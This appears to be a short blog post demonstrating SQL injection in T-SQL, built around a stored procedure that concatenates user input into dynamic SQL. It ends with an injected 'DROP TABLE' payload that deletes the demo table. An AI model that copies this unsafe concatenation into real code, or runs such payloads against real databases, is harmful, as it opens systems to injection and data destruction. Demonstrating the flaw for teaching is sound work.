CREATE TABLE TEMP_TEST_DETAILS
(
SNO INT,
EMP_NAME VARCHAR(100)
)
INSERT INTO TEMP_TEST_DETAILS
SELECT 1,'TEST'
/*Ordinary Dynamic SQL Procedure*/
ALTER PROCEDURE GetEmpDetails
@EmpName VARCHAR(200)
AS
BEGIN
DECLARE @Query VARCHAR(2000)
SET @Query = 'SELECT * FROM TEMP_TEST_DETAILS WHERE EMP_NAME = ' + '''' + @EmpName + ''''
PRINT @Query
EXEC (@Query)
END
/*Getting Results from above SQL Procedure*/
EXEC GetEmpDetails 'TEST'
/*Some Trick used with single quotation mark*/
EXEC GetEmpDetails 'TEST''; select ''1'
/*Finally Bomb!!!*/
EXEC GetEmpDetails 'TEST''; DROP TABLE TEMP_TEST_DETAILS; SELECT ''1'
SELECT * FROM TEMP_TEST_DETAILS
No comments:
Post a Comment